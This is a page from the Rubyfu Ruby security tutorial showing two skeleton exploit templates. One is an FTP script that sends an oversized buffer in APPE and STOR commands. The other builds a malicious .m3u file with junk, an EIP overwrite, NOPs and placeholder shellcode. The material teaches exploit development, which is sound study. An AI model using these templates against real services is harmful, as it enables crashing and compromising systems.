Rubyfu
Twitter
Github
NEW! Black Hat Ruby
Buy Me a Coffee
Search…
Primary version
Module 0x0 | Introduction
Contribution
Beginners
Required Gems
Module 0x1 | Basic Ruby Kung Fu
Module 0x2 | System Kung Fu
Module 0x3 | Network Kung Fu
Module 0x4 | Web Kung Fu
Module 0x5 | Exploitation Kung Fu
Fuzzer
Calling Windows APIs
Metasploit
metasm
Module 0x6 | Forensic Kung Fu
Module 0x7 | OSINT Kung Fu
References
FAQs
Contributors
Powered By
GitBook
Module 0x5 | Exploitation Kung Fu
Skeleton exploit
It's really a good thing to have a skeleton exploit to edit and use quickly during your exploitation process.
Network base
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
require
'socket'
4
​
5
buffer
=
"A"
*
2000
6
​
7
#--> Networking
8
host
=
ARGV
[
0
]
9
port
=
ARGV
[
1
]
||
21
10
​
11
s
=
TCPSocket
.
open
(
host
,
port
)
12
s
.
recv
(
1024
)
13
puts
"[+] Sending Username."
14
s
.
send
(
"USER ftp\r\n"
,
0
)
15
s
.
recv
(
1024
)
16
puts
"[+] Sending Password."
17
s
.
send
(
"PASS ftp\r\n"
,
0
)
18
s
.
recv
(
1024
)
19
puts
"[+] Sending Evil buffer..."
20
s
.
send
(
"APPE "
+
buffer
+
"\r\n"
,
0
)
21
total
=
s
.
send
(
"STOR "
+
buffer
+
"\r\n"
,
0
)
22
#--> Exploit Info
23
puts
"[+] "
+
"Total exploit size: "
+
"
#{
total
}
bytes."
24
puts
"[+] "
+
" Buffer length: "
+
"
#{
buffer
.
size
}
bytes."
25
puts
"[+] Done"
26
​
27
s
.
close
Copied!
To execute it
1
ruby ftp_exploit.rb [TARGET] [PORT]
Copied!
Notice that some services has to receive from it and some does not.
File base
Creating a simple exploit file
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
​
4
file
=
ARGV
[
0
]
||
"exploit.m3u"
5
​
6
junk
=
"A"
*
2000
7
eip
=
"B"
*
4
8
nops
=
"\x90"
*
8
9
shell
=
"S"
*
368
10
exploit
=
junk
+
eip
+
nops
+
shell
11
​
12
File
.
open
(
file
,
'w'
)
{
|
f
|
f
.
write
(
exploit
)
}
13
puts
"[*] Exploit size:
#{
exploit
.
size
}
"
Copied!
To execute it
1
ruby m3u_exploit.rb song1.m3u
Copied!
Previous
LDAP injection
Next
Fuzzer
Copy link
Contents
Skeleton exploit
Network base
File base